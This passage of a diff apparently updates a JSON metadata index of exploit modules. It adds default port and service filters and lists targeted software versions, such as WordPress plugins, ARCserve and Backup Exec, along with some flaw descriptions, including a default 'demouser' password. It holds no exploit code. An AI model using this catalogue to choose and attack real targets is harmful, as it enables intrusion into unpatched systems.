"rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Automatic" ], @@ -58107,6 +77415,21 @@ "platform": "Unix", "arch": "cmd", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "SkyBlueCanvas 1.1 r248" ], @@ -58142,6 +77465,21 @@ "platform": "PHP", "arch": "php", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Automatic" ], @@ -58177,6 +77515,21 @@ "platform": "PHP", "arch": "php", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Automatic" ], @@ -58210,6 +77563,21 @@ "platform": "Ruby", "arch": "ruby", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Automatic" ], @@ -58244,6 +77612,18 @@ "platform": "Unix", "arch": "cmd", "rport": 25, + "autofilter_ports": [ + 25, + 465, + 587, + 2525, + 25025, + 25000 + ], + "autofilter_services": [ + "smtp", + "smtps" + ], "targets": [ "SquirrelMail PGP plugin < 2.1" ], @@ -58278,6 +77658,21 @@ "platform": "PHP", "arch": "php", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "SugarCRM CE <= 6.5.23" ], @@ -58314,6 +77709,21 @@ "platform": "PHP", "arch": "php", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Automatic" ], @@ -58348,6 +77758,21 @@ "platform": "PHP", "arch": "php", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Automatic" ], @@ -58382,6 +77807,21 @@ "platform": "Unix", "arch": "cmd", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Automatic" ], @@ -58418,6 +77858,21 @@ "platform": "PHP", "arch": "php", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Automatic" ], @@ -58450,6 +77905,21 @@ "platform": "PHP", "arch": "php", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Automatic" ], @@ -58485,6 +77955,21 @@ "platform": "PHP", "arch": "php", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "trixbox CE 2.6.1" ], @@ -58518,6 +78003,21 @@ "platform": "PHP", "arch": "php", "rport": 443, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Tuleap <= 9.6" ], @@ -58551,6 +78051,21 @@ "platform": "PHP", "arch": "php", "rport": 443, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Generic (PHP Payload)" ], @@ -58586,6 +78101,21 @@ "platform": "Unix", "arch": "cmd", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Automatic" ], @@ -58621,6 +78151,21 @@ "platform": "Unix", "arch": "cmd", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Automatic" ], @@ -58655,6 +78200,21 @@ "platform": "Unix", "arch": "cmd", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Automatic" ], @@ -58691,6 +78251,21 @@ "platform": "PHP", "arch": "php", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "vBulletin 5.0.0 Beta 11-28" ], @@ -58732,6 +78307,21 @@ "platform": "Unix", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "CMD" ], @@ -58763,6 +78353,21 @@ "platform": "Unix", "arch": "cmd", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Automatic Targeting" ], @@ -58799,6 +78404,21 @@ "platform": "Unix", "arch": "cmd", "rport": 10000, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Webmin 1.580" ], @@ -58831,6 +78451,21 @@ "platform": "Unix", "arch": "cmd", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "WebTester version 5.x" ], @@ -58851,7 +78486,7 @@ "disclosure_date": "2015-02-21", "type": "exploit", "author": [ - "Rob Carr " + "rastating" ], "description": "This module will generate a plugin, pack the payload into it\n and upload it to a server running WordPress providing valid\n admin credentials are used.", "references": [ @@ -58862,10 +78497,25 @@ "platform": "PHP", "arch": "php", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "WordPress" ], - "mod_time": "2018-01-15 14:48:59 +0000", + "mod_time": "2018-10-01 18:59:09 +0000", "path": "/modules/exploits/unix/webapp/wp_admin_shell_upload.rb", "is_install_path": true, "ref_name": "unix/webapp/wp_admin_shell_upload", @@ -58895,6 +78545,21 @@ "platform": "PHP", "arch": "php", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Automatic" ], @@ -58927,6 +78592,21 @@ "platform": "PHP", "arch": "php", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Ajax Load More 2.8.1.1" ], @@ -58963,6 +78643,21 @@ "platform": "PHP", "arch": "php", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "asset-manager <= 2.0" ], @@ -58997,6 +78692,21 @@ "platform": "PHP", "arch": "php", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Creative Contact Form 0.9.7" ], @@ -59030,6 +78740,21 @@ "platform": "PHP", "arch": "php", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "download-manager < 2.7.5" ], @@ -59051,7 +78776,7 @@ "type": "exploit", "author": [ "Kacper Szurek", - "Rob Carr " + "rastating" ], "description": "WordPress Shopping Cart (WP EasyCart) Plugin for\n WordPress contains a flaw that allows a remote\n attacker to execute arbitrary PHP code. This\n flaw exists because the\n /inc/amfphp/administration/banneruploaderscript.php\n script does not properly verify or sanitize\n user-uploaded files. By uploading a .php file,\n the remote system will place the file in a\n user-accessible path. Making a direct request to\n the uploaded file will allow the attacker to\n execute the script with the privileges of the web\n server.\n\n In versions <= 3.0.8 authentication can be done by\n using the WordPress credentials of a user with any\n role. In later versions, a valid EasyCart admin\n password will be required that is in use by any\n admin user. A default installation of EasyCart will\n setup a user called \"demouser\" with a preset password\n of \"demouser\".", "references": [ @@ -59064,10 +78789,25 @@ "platform": "PHP", "arch": "php", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "wp-easycart" ], - "mod_time": "2018-08-20 16:05:58 +0000", + "mod_time": "2018-10-01 18:59:09 +0000", "path": "/modules/exploits/unix/webapp/wp_easycart_unrestricted_file_upload.rb", "is_install_path": true, "ref_name": "unix/webapp/wp_easycart_unrestricted_file_upload", @@ -59098,6 +78838,21 @@ "platform": "PHP", "arch": "php", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Foxypress 0.4.1.1 - 0.4.2.1" ], @@ -59132,6 +78887,21 @@ "platform": "PHP", "arch": "php", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Front-End Editor 2.2.1" ], @@ -59166,6 +78936,21 @@ "platform": "PHP", "arch": "php", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Automatic" ], @@ -59187,7 +78972,7 @@ "type": "exploit", "author": [ "Alexander Borg", - "Rob Carr " + "rastating" ], "description": "This module exploits a file upload vulnerability in all versions of the\n Holding Pattern theme found in the upload_file.php script which contains\n no session or file validation. It allows unauthenticated users to upload\n files of any type and subsequently execute PHP scripts in the context of\n the web server.", "references": [ @@ -59200,10 +78985,25 @@ "platform": "PHP", "arch": "php", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "holding_pattern" ], - "mod_time": "2017-07-24 06:26:21 +0000", + "mod_time": "2018-10-01 18:59:09 +0000", "path": "/modules/exploits/unix/webapp/wp_holding_pattern_file_upload.rb", "is_install_path": true, "ref_name": "unix/webapp/wp_holding_pattern_file_upload", @@ -59234,6 +79034,21 @@ "platform": "PHP", "arch": "php", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "InBoundio Marketing 2.0" ], @@ -59268,6 +79083,21 @@ "platform": "PHP", "arch": "php", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Infusionsoft 1.5.3 - 1.5.10" ], @@ -59303,6 +79133,21 @@ "platform": "PHP", "arch": "php", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Automatic" ], @@ -59338,6 +79183,21 @@ "platform": "PHP", "arch": "php", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "wp-mobile-detectory < 3.6" ], @@ -59371,6 +79231,21 @@ "platform": "PHP", "arch": "php", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "N-Media WebSite Contact Form 1.3.4" ], @@ -59405,6 +79280,21 @@ "platform": "PHP", "arch": "php", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "OptimizePress" ], @@ -59426,7 +79316,7 @@ "type": "exploit", "author": [ "Kacper Szurek", - "Rob Carr " + "rastating" ], "description": "Photo Gallery Plugin for WordPress contains a flaw that allows a\n remote attacker to execute arbitrary PHP code. This flaw exists\n because the photo-gallery\\photo-gallery.php script allows access\n to filemanager\\UploadHandler.php. The post() method in UploadHandler.php\n does not properly verify or sanitize user-uploaded files.\n\n This module was tested on version 1.2.5.", "references": [ @@ -59440,10 +79330,25 @@ "platform": "PHP", "arch": "php", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "photo-gallery < 1.2.6" ], - "mod_time": "2017-07-24 06:26:21 +0000", + "mod_time": "2018-10-01 18:59:09 +0000", "path": "/modules/exploits/unix/webapp/wp_photo_gallery_unrestricted_file_upload.rb", "is_install_path": true, "ref_name": "unix/webapp/wp_photo_gallery_unrestricted_file_upload", @@ -59475,6 +79380,21 @@ "platform": "Linux", "arch": "x86, x64", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "WordPress 4.6 / Exim" ], @@ -59510,6 +79430,21 @@ "platform": "PHP", "arch": "php", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "pixabay-images 2.3" ], @@ -59543,6 +79478,21 @@ "platform": "PHP", "arch": "php", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "platform < 1.4.4, platform pro < 1.6.2" ], @@ -59579,6 +79529,21 @@ "platform": "PHP", "arch": "php", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "wp-property <= 1.35.0" ], @@ -59614,6 +79579,21 @@ "platform": "PHP", "arch": "php", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Reflex Gallery 3.1.3" ], @@ -59650,6 +79630,21 @@ "platform": "PHP", "arch": "php", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "ThemePunch Revolution Slider (revslider) 3.0.95" ], @@ -59684,6 +79679,21 @@ "platform": "PHP", "arch": "php", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "WP SlideShow Gallery 1.4.6" ], @@ -59705,7 +79715,7 @@ "type": "exploit", "author": [ "Claudio Viviani", - "Rob Carr " + "rastating" ], "description": "WP Symposium Plugin for WordPress contains a flaw that allows a remote attacker\n to execute arbitrary PHP code. This flaw exists because the\n /wp-symposium/server/file_upload_form.php script does not properly verify or\n sanitize user-uploaded files. By uploading a .php file, the remote system will\n place the file in a user-accessible path. Making a direct request to the\n uploaded file will allow the attacker to execute the script with the privileges\n of the web server.", "references": [ @@ -59717,10 +79727,25 @@ "platform": "PHP", "arch": "php", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "wp-symposium < 14.12" ], - "mod_time": "2017-07-24 06:26:21 +0000", + "mod_time": "2018-10-01 18:59:09 +0000", "path": "/modules/exploits/unix/webapp/wp_symposium_shell_upload.rb", "is_install_path": true, "ref_name": "unix/webapp/wp_symposium_shell_upload", @@ -59756,6 +79781,21 @@ "platform": "PHP", "arch": "php", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Wordpress 3.5" ], @@ -59790,6 +79830,21 @@ "platform": "PHP", "arch": "php", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Work The Flow 2.5.2" ], @@ -59823,6 +79878,21 @@ "platform": "PHP", "arch": "php", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "WPshop eCommerce 1.3.9.5" ], @@ -59856,6 +79926,21 @@ "platform": "PHP", "arch": "php", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "wptouch < 3.4.3" ], @@ -59891,6 +79976,21 @@ "platform": "PHP", "arch": "php", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "wysija-newsletters < 2.6.8" ], @@ -59925,6 +80025,21 @@ "platform": "PHP", "arch": "php", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "XODA 0.4.5" ], @@ -59958,6 +80073,21 @@ "platform": "Linux", "arch": "x86", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "ZeroShell 2.0 RC2" ], @@ -59994,6 +80124,21 @@ "platform": "Linux", "arch": "", "rport": 7071, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Zimbra 8.0.2 / Linux" ], @@ -60028,6 +80173,21 @@ "platform": "Unix", "arch": "cmd", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Automatic Targeting" ], @@ -60062,6 +80222,21 @@ "platform": "Unix", "arch": "cmd", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "ZPanel 10.0.0.2 on Linux" ], @@ -60093,6 +80268,12 @@ "platform": "Unix", "arch": "cmd", "rport": 6000, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "xterm (Generic)", "gnome-terminal (Ubuntu)" @@ -60127,6 +80308,12 @@ "platform": "Windows", "arch": "", "rport": 38292, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows Universal" ], @@ -60162,6 +80349,12 @@ "platform": "Windows", "arch": "", "rport": 12174, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows Universal" ], @@ -60200,6 +80393,21 @@ "platform": "Windows", "arch": "x86", "rport": 9090, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Windows VBS Stager" ], @@ -60233,6 +80441,12 @@ "platform": "Windows", "arch": "", "rport": 38292, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows 2003", "Windows 2000 All" @@ -60268,6 +80482,12 @@ "platform": "Windows", "arch": "", "rport": 2967, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "SCS 3.0.2 build 10.0.2.2000" ], @@ -60304,6 +80524,21 @@ "platform": "Java", "arch": "java", "rport": 9855, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Symantec Workspace Streaming 6.1 SP8 / Java Universal" ], @@ -60337,6 +80572,12 @@ "platform": "Windows", "arch": "", "rport": 5168, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Trend Micro ServerProtect 5.58 Build 1060" ], @@ -60370,6 +80611,12 @@ "platform": "Windows", "arch": "", "rport": 5168, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Trend Micro ServerProtect 5.58 Build 1060" ], @@ -60403,6 +80650,12 @@ "platform": "Windows", "arch": "", "rport": 3628, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Trend Micro ServerProtect 5.58 Build 1060" ], @@ -60437,6 +80690,12 @@ "platform": "Windows", "arch": "", "rport": 617, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Arkeia 5.3.3 and 5.2.27 Windows (All)", "Arkeia 5.2.27 and 5.1.19 Windows (All)", @@ -60480,6 +80739,12 @@ "platform": "Windows", "arch": "", "rport": 7777, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Automatic" ], @@ -60514,6 +80779,12 @@ "platform": "Windows", "arch": "", "rport": 6101, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Veritas BE 9.1 SP0/SP1", "Veritas BE 8.5" @@ -60549,6 +80820,12 @@ "platform": "Windows", "arch": "", "rport": 10000, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Veritas BE 9.0/9.1/10.0 (All Windows)", "Veritas BE 9.0/9.1/10.0 (Windows 2000)" @@ -60583,6 +80860,12 @@ "platform": "Windows", "arch": "", "rport": 10000, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Backup Exec 14 (14.1 / revision 9.1), Windows >= 8 x64", "Backup Exec 14 (14.1 / revision 9.1), Windows >= 8 x86", @@ -60629,6 +80912,14 @@ "platform": "Windows", "arch": "", "rport": 6504, + "autofilter_ports": [ + 139, + 445 + ], + "autofilter_services": [ + "netbios-ssn", + "microsoft-ds" + ], "targets": [ "Computer Associates BrightStor ARCserve r11.5 (build 3884)" ], @@ -60665,6 +80956,12 @@ "platform": "Windows", "arch": "", "rport": 41523, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "cheyprod.dll 9/14/2000", "cheyprod.dll 12/12/2003", @@ -60702,6 +80999,12 @@ "platform": "Windows", "arch": "", "rport": 41524, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "cheyprod.dll 12/12/2003", "cheyprod.dll 07/21/2004" @@ -60736,6 +81039,14 @@ "platform": "Windows", "arch": "", "rport": 445, + "autofilter_ports": [ + 139, + 445 + ], + "autofilter_services": [ + "netbios-ssn", + "microsoft-ds" + ], "targets": [ "Windows 2003 SP0 English", "Windows 2000 SP4 English", @@ -60771,6 +81082,12 @@ "platform": "Windows", "arch": "", "rport": 2000, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "BrightStor HSM 11.5 Windows All" ], @@ -60804,6 +81121,12 @@ "platform": "Windows", "arch": "", "rport": 1900, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows 2000 Pro English All" ], @@ -60837,6 +81160,12 @@ "platform": "Windows", "arch": "", "rport": 1900, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows 2000 SP4 English" ], @@ -60870,6 +81199,12 @@ "platform": "Windows", "arch": "", "rport": 1900, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows 2003 SP0 English", "Windows 2000 SP4 English" @@ -60904,6 +81239,12 @@ "platform": "Windows", "arch": "", "rport": 1900, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows 2000 SP4 English" ], @@ -60937,6 +81278,12 @@ "platform": "Windows", "arch": "", "rport": 1900, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows 2003 SP0 English", "Windows 2000 SP4 English" @@ -60971,6 +81318,12 @@ "platform": "Windows", "arch": "", "rport": 10202, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows 2003 SP0 English", "Windows 2000 SP4 English" @@ -61006,6 +81359,12 @@ "platform": "Windows", "arch": "", "rport": 111, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "BrightStor Arcserve 9.0 (?) - 11.5 SP2 (Windows 2000)", "BrightStor Arcserve 9.0 (?) - 11.5 SP2 (Windows 2003)", @@ -61042,6 +81401,12 @@ "platform": "Windows", "arch": "", "rport": 6503, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "BrightStor ARCserve r11.1", "BrightStor ARCserve r11.5", @@ -61076,6 +81441,12 @@ "platform": "Windows", "arch": "", "rport": 6504, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "BrightStor ARCserve r11.5/Windows 2003" ], @@ -61109,6 +81480,12 @@ "platform": "Windows", "arch": "", "rport": 6503, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows 2000 SP4 English" ], @@ -61144,6 +81521,12 @@ "platform": "Windows", "arch": "", "rport": 6070, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "ARCServe 11.0 Asbrdcst.dll 12/12/2003", "ARCServe 11.1 Asbrdcst.dll 07/21/2004", @@ -61187,6 +81570,12 @@ "platform": "Windows", "arch": "", "rport": 6502, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "BrightStor ARCserve r11.1", "BrightStor ARCserve r11.5" @@ -61220,6 +81609,12 @@ "platform": "Windows", "arch": "", "rport": 6502, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "BrightStor ARCserve r11.5/Windows 2003" ], @@ -61254,6 +81649,12 @@ "platform": "Windows", "arch": "", "rport": 6050, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Magic Heap Target #1" ], @@ -61290,6 +81691,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Automatic" ], @@ -61326,6 +81733,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Automatic" ], @@ -61362,6 +81775,12 @@ "platform": "Windows", "arch": "x86", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Automatic" ], @@ -61402,6 +81821,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Automatic" ], @@ -61441,6 +81866,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Automatic" ], @@ -61478,6 +81909,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Automatic" ], @@ -61515,6 +81952,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Automatic", "IE 6 on Windows XP SP3", @@ -61561,6 +82004,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Automatic", "IE 6 on Windows XP SP3", @@ -61601,6 +82050,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Automatic" ], @@ -61641,6 +82096,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Automatic" ], @@ -61678,6 +82139,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Automatic", "IE 6 on Windows XP SP3", @@ -61720,6 +82187,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Automatic", "IE 6 on Windows XP SP3", @@ -61758,6 +82231,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + 